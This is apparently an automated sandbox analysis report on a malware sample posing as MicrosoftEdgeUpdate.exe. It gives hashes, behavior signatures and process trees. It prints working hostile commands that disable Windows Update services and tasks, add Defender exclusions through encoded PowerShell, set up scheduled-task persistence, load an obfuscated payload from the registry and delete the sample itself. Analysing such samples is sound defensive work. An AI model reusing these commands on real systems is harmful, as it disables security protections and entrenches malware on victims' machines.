Analysis
-
max time kernel
54s -
max time network
60s -
platform
windows10-2004_x64 -
resource
win10v2004-20221111-en -
resource tags
arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system -
submitted
16-01-2023 01:14
Behavioral task
behavioral1
Sample
MicrosoftEdgeUpdate.exe
Resource
win7-20220901-en
General
-
Target
MicrosoftEdgeUpdate.exe
-
Size
4.9MB
-
MD5
8223e55c97c61478aa4230b2ca498a38
-
SHA1
a42c6d401fbf798806c5fe85c47cc047c189e486
-
SHA256
496b8bd286c915005f3c55317df916ec79ad773e7b88e7f52ae7019f2f071ba7
-
SHA512
5a2f32412d677e22602e0155a70328d9836e06eb26f59b6872b902fd044a7fb1011e066696018ae3db018282169e47e00aea3a861643662746543ab5f4d2f93d
-
SSDEEP
98304:NKB0rS8yY+gIpexlkt2GguS8qth97fOMFz7lFrL8XE:8BaQgGft2hqeh97fOmXlFk
Malware Config
Signatures
-
Modifies security service 2 TTPs 5 IoCs
Processes:
reg.exedescription ioc process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 reg.exe -
Drops file in Drivers directory 1 IoCs
Processes:
MicrosoftEdgeUpdate.exedescription ioc process File opened for modification C:\Windows\system32\drivers\etc\hosts MicrosoftEdgeUpdate.exe -
Possible privilege escalation attempt 2 IoCs
Processes:
takeown.exeicacls.exepid process 4220 takeown.exe 928 icacls.exe -
Stops running service(s) 3 TTPs
-
Processes:
resource yara_rule behavioral2/memory/2272-132-0x0000000000060000-0x00000000009E4000-memory.dmp vmprotect -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
MicrosoftEdgeUpdate.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-4246620582-653642754-1174164128-1000\Control Panel\International\Geo\Nation MicrosoftEdgeUpdate.exe -
Modifies file permissions 1 TTPs 2 IoCs
Processes:
takeown.exeicacls.exepid process 4220 takeown.exe 928 icacls.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 10 ip-api.com -
Suspicious use of SetThreadContext 1 IoCs
Processes:
MicrosoftEdgeUpdate.exedescription pid process target process PID 2272 set thread context of 4792 2272 MicrosoftEdgeUpdate.exe conhost.exe -
Drops file in Windows directory 4 IoCs
Processes:
conhost.exedescription ioc process File created C:\Windows\Tasks\dialersvc32.job conhost.exe File opened for modification C:\Windows\Tasks\dialersvc32.job conhost.exe File created C:\Windows\Tasks\dialersvc64.job conhost.exe File opened for modification C:\Windows\Tasks\dialersvc64.job conhost.exe -
Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exepid process 2816 sc.exe 4032 sc.exe 452 sc.exe 540 sc.exe 3616 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Modifies registry key 1 TTPs 9 IoCs
Processes:
reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exepid process 2276 reg.exe 4116 reg.exe 2372 reg.exe 4896 reg.exe 912 reg.exe 4808 reg.exe 2184 reg.exe 1196 reg.exe 4292 reg.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
powershell.exeMicrosoftEdgeUpdate.exepowershell.exepid process 4976 powershell.exe 4976 powershell.exe 2272 MicrosoftEdgeUpdate.exe 1692 powershell.exe 1692 powershell.exe -
Suspicious use of AdjustPrivilegeToken 12 IoCs
Processes:
powershell.exeMicrosoftEdgeUpdate.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exetakeown.exepowershell.exedescription pid process Token: SeDebugPrivilege 4976 powershell.exe Token: SeDebugPrivilege 2272 MicrosoftEdgeUpdate.exe Token: SeShutdownPrivilege 532 powercfg.exe Token: SeCreatePagefilePrivilege 532 powercfg.exe Token: SeShutdownPrivilege 4016 powercfg.exe Token: SeCreatePagefilePrivilege 4016 powercfg.exe Token: SeShutdownPrivilege 3112 powercfg.exe Token: SeCreatePagefilePrivilege 3112 powercfg.exe Token: SeShutdownPrivilege 3708 powercfg.exe Token: SeCreatePagefilePrivilege 3708 powercfg.exe Token: SeTakeOwnershipPrivilege 4220 takeown.exe Token: SeDebugPrivilege 1692 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
MicrosoftEdgeUpdate.execmd.execmd.exedescription pid process target process PID 2272 wrote to memory of 4976 2272 MicrosoftEdgeUpdate.exe powershell.exe PID 2272 wrote to memory of 4976 2272 MicrosoftEdgeUpdate.exe powershell.exe PID 2272 wrote to memory of 4248 2272 MicrosoftEdgeUpdate.exe cmd.exe PID 2272 wrote to memory of 4248 2272 MicrosoftEdgeUpdate.exe cmd.exe PID 2272 wrote to memory of 1496 2272 MicrosoftEdgeUpdate.exe cmd.exe PID 2272 wrote to memory of 1496 2272 MicrosoftEdgeUpdate.exe cmd.exe PID 4248 wrote to memory of 2816 4248 cmd.exe sc.exe PID 4248 wrote to memory of 2816 4248 cmd.exe sc.exe PID 4248 wrote to memory of 4032 4248 cmd.exe sc.exe PID 4248 wrote to memory of 4032 4248 cmd.exe sc.exe PID 1496 wrote to memory of 532 1496 cmd.exe powercfg.exe PID 1496 wrote to memory of 532 1496 cmd.exe powercfg.exe PID 4248 wrote to memory of 452 4248 cmd.exe sc.exe PID 4248 wrote to memory of 452 4248 cmd.exe sc.exe PID 1496 wrote to memory of 4016 1496 cmd.exe powercfg.exe PID 1496 wrote to memory of 4016 1496 cmd.exe powercfg.exe PID 4248 wrote to memory of 540 4248 cmd.exe sc.exe PID 4248 wrote to memory of 540 4248 cmd.exe sc.exe PID 1496 wrote to memory of 3112 1496 cmd.exe powercfg.exe PID 1496 wrote to memory of 3112 1496 cmd.exe powercfg.exe PID 4248 wrote to memory of 3616 4248 cmd.exe sc.exe PID 4248 wrote to memory of 3616 4248 cmd.exe sc.exe PID 1496 wrote to memory of 3708 1496 cmd.exe powercfg.exe PID 1496 wrote to memory of 3708 1496 cmd.exe powercfg.exe PID 4248 wrote to memory of 2276 4248 cmd.exe reg.exe PID 4248 wrote to memory of 2276 4248 cmd.exe reg.exe PID 4248 wrote to memory of 4808 4248 cmd.exe reg.exe PID 4248 wrote to memory of 4808 4248 cmd.exe reg.exe PID 4248 wrote to memory of 2184 4248 cmd.exe reg.exe PID 4248 wrote to memory of 2184 4248 cmd.exe reg.exe PID 4248 wrote to memory of 1196 4248 cmd.exe reg.exe PID 4248 wrote to memory of 1196 4248 cmd.exe reg.exe PID 4248 wrote to memory of 4292 4248 cmd.exe reg.exe PID 4248 wrote to memory of 4292 4248 cmd.exe reg.exe PID 4248 wrote to memory of 4220 4248 cmd.exe takeown.exe PID 4248 wrote to memory of 4220 4248 cmd.exe takeown.exe PID 4248 wrote to memory of 928 4248 cmd.exe icacls.exe PID 4248 wrote to memory of 928 4248 cmd.exe icacls.exe PID 4248 wrote to memory of 4116 4248 cmd.exe reg.exe PID 4248 wrote to memory of 4116 4248 cmd.exe reg.exe PID 4248 wrote to memory of 2372 4248 cmd.exe reg.exe PID 4248 wrote to memory of 2372 4248 cmd.exe reg.exe PID 4248 wrote to memory of 4896 4248 cmd.exe reg.exe PID 4248 wrote to memory of 4896 4248 cmd.exe reg.exe PID 4248 wrote to memory of 912 4248 cmd.exe reg.exe PID 4248 wrote to memory of 912 4248 cmd.exe reg.exe PID 4248 wrote to memory of 2216 4248 cmd.exe schtasks.exe PID 4248 wrote to memory of 2216 4248 cmd.exe schtasks.exe PID 4248 wrote to memory of 4820 4248 cmd.exe schtasks.exe PID 4248 wrote to memory of 4820 4248 cmd.exe schtasks.exe PID 4248 wrote to memory of 1504 4248 cmd.exe schtasks.exe PID 4248 wrote to memory of 1504 4248 cmd.exe schtasks.exe PID 4248 wrote to memory of 3716 4248 cmd.exe schtasks.exe PID 4248 wrote to memory of 3716 4248 cmd.exe schtasks.exe PID 4248 wrote to memory of 4940 4248 cmd.exe schtasks.exe PID 4248 wrote to memory of 4940 4248 cmd.exe schtasks.exe PID 4248 wrote to memory of 1140 4248 cmd.exe schtasks.exe PID 4248 wrote to memory of 1140 4248 cmd.exe schtasks.exe PID 4248 wrote to memory of 3592 4248 cmd.exe schtasks.exe PID 4248 wrote to memory of 3592 4248 cmd.exe schtasks.exe PID 2272 wrote to memory of 4792 2272 MicrosoftEdgeUpdate.exe conhost.exe PID 2272 wrote to memory of 4792 2272 MicrosoftEdgeUpdate.exe conhost.exe PID 2272 wrote to memory of 4792 2272 MicrosoftEdgeUpdate.exe conhost.exe PID 2272 wrote to memory of 4792 2272 MicrosoftEdgeUpdate.exe conhost.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\MicrosoftEdgeUpdate.exe"C:\Users\Admin\AppData\Local\Temp\MicrosoftEdgeUpdate.exe"1⤵
- Drops file in Drivers directory
- Checks computer location settings
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGgAYgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHAAZABjAHAAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAcgBiACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGwAaQB5ACMAPgA="2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop bits3⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop dosvc3⤵
- Launches sc.exe
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f3⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f3⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f3⤵
- Modifies security service
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f3⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f3⤵
- Modifies registry key
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f3⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f3⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f3⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f3⤵
- Modifies registry key
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE3⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE3⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE3⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE3⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE3⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE3⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe2⤵
- Drops file in Windows directory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHQAdAAjAD4AIABSAGUAZwBpAHMAdABlAHIALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrACAALQBBAGMAdABpAG8AbgAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAEEAYwB0AGkAbwBuACAALQBFAHgAZQBjAHUAdABlACAAJwBwAG8AdwBlAHIAcwBoAGUAbABsACcAIAAtAEEAcgBnAHUAbQBlAG4AdAAgACcALQBFAG4AYwBvAGQAZQBkAEMAbwBtAG0AYQBuAGQAIAAiAFAAQQBBAGoAQQBIAG8AQQBiAHcAQQBqAEEARAA0AEEASQBBAEIAVABBAEgAUQBBAFkAUQBCAHkAQQBIAFEAQQBMAFEAQgBRAEEASABJAEEAYgB3AEIAagBBAEcAVQBBAGMAdwBCAHoAQQBDAEEAQQBMAFEAQgBHAEEARwBrAEEAYgBBAEIAbABBAEYAQQBBAFkAUQBCADAAQQBHAGcAQQBJAEEAQQBuAEEARQBNAEEATwBnAEIAYwBBAEYAQQBBAGMAZwBCAHYAQQBHAGMAQQBjAGcAQgBoAEEARwAwAEEASQBBAEIARwBBAEcAawBBAGIAQQBCAGwAQQBIAE0AQQBYAEEAQgBOAEEARwBrAEEAWQB3AEIAeQBBAEcAOABBAGMAdwBCAHYAQQBHAFkAQQBkAEEAQgBjAEEARQBVAEEAWgBBAEIAbgBBAEcAVQBBAFYAUQBCAHcAQQBHAFEAQQBZAFEAQgAwAEEARwBVAEEAYwBnAEIAYwBBAEUAMABBAGEAUQBCAGoAQQBIAEkAQQBiAHcAQgB6AEEARwA4AEEAWgBnAEIAMABBAEUAVQBBAFoAQQBCAG4AQQBHAFUAQQBWAFEAQgB3AEEARwBRAEEAWQBRAEIAMABBAEcAVQBBAEwAZwBCAGwAQQBIAGcAQQBaAFEAQQBuAEEAQwBBAEEATABRAEIAVwBBAEcAVQBBAGMAZwBCAGkAQQBDAEEAQQBVAGcAQgAxAEEARwA0AEEAUQBRAEIAegBBAEMAQQBBAFAAQQBBAGoAQQBHAGcAQQBaAFEAQQBqAEEARAA0AEEAIgAnACkAIAA8ACMAdQBtAGQAbAAjAD4AIAAtAFQAcgBpAGcAZwBlAHIAIAAoAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBUAHIAaQBnAGcAZQByACAALQBBAHQAUwB0AGEAcgB0AHUAcAApACAAPAAjAGoAYQBnACMAPgAgAC0AUwBlAHQAdABpAG4AZwBzACAAKABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAUwBlAHQAdABpAG4AZwBzAFMAZQB0ACAALQBBAGwAbABvAHcAUwB0AGEAcgB0AEkAZgBPAG4AQgBhAHQAdABlAHIAaQBlAHMAIAAtAEQAaQBzAGEAbABsAG8AdwBIAGEAcgBkAFQAZQByAG0AaQBuAGEAdABlACAALQBEAG8AbgB0AFMAdABvAHAASQBmAEcAbwBpAG4AZwBPAG4AQgBhAHQAdABlAHIAaQBlAHMAIAAtAEQAbwBuAHQAUwB0AG8AcABPAG4ASQBkAGwAZQBFAG4AZAAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AVABpAG0AZQBMAGkAbQBpAHQAIAAoAE4AZQB3AC0AVABpAG0AZQBTAHAAYQBuACAALQBEAGEAeQBzACAAMQAwADAAMAApACkAIAA8ACMAbwB1AHgAYgAjAD4AIAAtAFQAYQBzAGsATgBhAG0AZQAgACcATQBpAGMAcgBvAHMAbwBmAHQAIABFAGQAZwBlACAAVQBwAGQAYQB0AGUAIAAnACAALQBVAHMAZQByACAAJwBTAHkAcwB0AGUAbQAnACAALQBSAHUAbgBMAGUAdgBlAGwAIAAnAEgAaQBnAGgAZQBzAHQAJwAgAC0ARgBvAHIAYwBlACAAPAAjAGUAbwAjAD4AOwAgAEMAbwBwAHkALQBJAHQAZQBtACAAJwBDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcAE0AaQBjAHIAbwBzAG8AZgB0AEUAZABnAGUAVQBwAGQAYQB0AGUALgBlAHgAZQAnACAALQBEAGUAcwB0AGkAbgBhAHQAaQBvAG4AIAAnAEMAOgBcAFAAcgBvAGcAcgBhAG0AIABGAGkAbABlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAEUAZABnAGUAVQBwAGQAYQB0AGUAcgBcAE0AaQBjAHIAbwBzAG8AZgB0AEUAZABnAGUAVQBwAGQAYQB0AGUALgBlAHgAZQAnACAALQBGAG8AcgBjAGUAIAA8ACMAbwBrAGgAcwAjAD4AOwAgAFMAdABhAHIAdAAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAIAA8ACMAdwB3AGUAIwA+ACAALQBUAGEAcwBrAE4AYQBtAGUAIAAnAE0AaQBjAHIAbwBzAG8AZgB0ACAARQBkAGcAZQAgAFUAcABkAGEAdABlACAAJwA7AA=="2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\MicrosoftEdgeUpdate.exe"2⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 33⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"1⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"1⤵
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{5ef4d8bd-ce93-4d6f-8e36-7cbacd175ae2}1⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -EncodedCommand "PAAjAHoAbwAjAD4AIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAAnAEMAOgBcAFAAcgBvAGcAcgBhAG0AIABGAGkAbABlAHMAXABNAGkAYwByAG8AcwBvAGYAdABcAEUAZABnAGUAVQBwAGQAYQB0AGUAcgBcAE0AaQBjAHIAbwBzAG8AZgB0AEUAZABnAGUAVQBwAGQAYQB0AGUALgBlAHgAZQAnACAALQBWAGUAcgBiACAAUgB1AG4AQQBzACAAPAAjAGgAZQAjAD4A"1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD56d42b6da621e8df5674e26b799c8e2aa
SHA1ab3ce1327ea1eeedb987ec823d5e0cb146bafa48
SHA2565ab6a1726f425c6d0158f55eb8d81754ddedd51e651aa0a899a29b7a58619c4c
SHA51253faffbda8a835bc1143e894c118c15901a5fd09cfc2224dd2f754c06dc794897315049a579b9a8382d4564f071576045aaaf824019b7139d939152dca38ce29
-
memory/452-146-0x0000000000000000-mapping.dmp
-
memory/532-145-0x0000000000000000-mapping.dmp
-
memory/540-148-0x0000000000000000-mapping.dmp
-
memory/912-162-0x0000000000000000-mapping.dmp
-
memory/928-158-0x0000000000000000-mapping.dmp
-
memory/1140-168-0x0000000000000000-mapping.dmp
-
memory/1196-155-0x0000000000000000-mapping.dmp
-
memory/1424-196-0x0000000000000000-mapping.dmp
-
memory/1496-141-0x0000000000000000-mapping.dmp
-
memory/1504-165-0x0000000000000000-mapping.dmp
-
memory/1672-197-0x0000000000000000-mapping.dmp
-
memory/1692-194-0x00007FFA61D30000-0x00007FFA627F1000-memory.dmpFilesize
10.8MB
-
memory/1692-178-0x00007FFA61D30000-0x00007FFA627F1000-memory.dmpFilesize
10.8MB
-
memory/1692-175-0x0000000000000000-mapping.dmp
-
memory/2184-154-0x0000000000000000-mapping.dmp
-
memory/2216-163-0x0000000000000000-mapping.dmp
-
memory/2272-139-0x00007FFA61D30000-0x00007FFA627F1000-memory.dmpFilesize
10.8MB
-
memory/2272-198-0x00007FFA61D30000-0x00007FFA627F1000-memory.dmpFilesize
10.8MB
-
memory/2272-144-0x000000001D460000-0x000000001D472000-memory.dmpFilesize
72KB
-
memory/2272-132-0x0000000000060000-0x00000000009E4000-memory.dmpFilesize
9.5MB
-
memory/2272-133-0x00007FFA61D30000-0x00007FFA627F1000-memory.dmpFilesize
10.8MB
-
memory/2276-152-0x0000000000000000-mapping.dmp
-
memory/2372-160-0x0000000000000000-mapping.dmp
-
memory/2508-186-0x0000000004660000-0x0000000004C88000-memory.dmpFilesize
6.2MB
-
memory/2508-181-0x0000000003FF0000-0x0000000004026000-memory.dmpFilesize
216KB
-
memory/2816-142-0x0000000000000000-mapping.dmp
-
memory/3092-191-0x00007FFA81510000-0x00007FFA81705000-memory.dmpFilesize
2.0MB
-
memory/3092-179-0x00007FFA61D30000-0x00007FFA627F1000-memory.dmpFilesize
10.8MB
-
memory/3092-180-0x00007FFA81510000-0x00007FFA81705000-memory.dmpFilesize
2.0MB
-
memory/3092-182-0x00007FFA80280000-0x00007FFA8033E000-memory.dmpFilesize
760KB
-
memory/3092-190-0x00007FFA61D30000-0x00007FFA627F1000-memory.dmpFilesize
10.8MB
-
memory/3092-192-0x00007FFA80280000-0x00007FFA8033E000-memory.dmpFilesize
760KB
-
memory/3112-149-0x0000000000000000-mapping.dmp
-
memory/3592-169-0x0000000000000000-mapping.dmp
-
memory/3616-150-0x0000000000000000-mapping.dmp
-
memory/3708-151-0x0000000000000000-mapping.dmp
-
memory/3716-166-0x0000000000000000-mapping.dmp
-
memory/3768-193-0x0000000140000000-0x0000000140042000-memory.dmpFilesize
264KB
-
memory/3768-183-0x0000000140000000-0x0000000140042000-memory.dmpFilesize
264KB
-
memory/3768-187-0x0000000140000000-0x0000000140042000-memory.dmpFilesize
264KB
-
memory/3768-185-0x0000000140000000-0x0000000140042000-memory.dmpFilesize
264KB
-
memory/3768-195-0x00007FFA81510000-0x00007FFA81705000-memory.dmpFilesize
2.0MB
-
memory/3768-189-0x00007FFA80280000-0x00007FFA8033E000-memory.dmpFilesize
760KB
-
memory/3768-184-0x00000001400033F4-mapping.dmp
-
memory/3768-188-0x00007FFA81510000-0x00007FFA81705000-memory.dmpFilesize
2.0MB
-
memory/4016-147-0x0000000000000000-mapping.dmp
-
memory/4032-143-0x0000000000000000-mapping.dmp
-
memory/4116-159-0x0000000000000000-mapping.dmp
-
memory/4220-157-0x0000000000000000-mapping.dmp
-
memory/4248-140-0x0000000000000000-mapping.dmp
-
memory/4292-156-0x0000000000000000-mapping.dmp
-
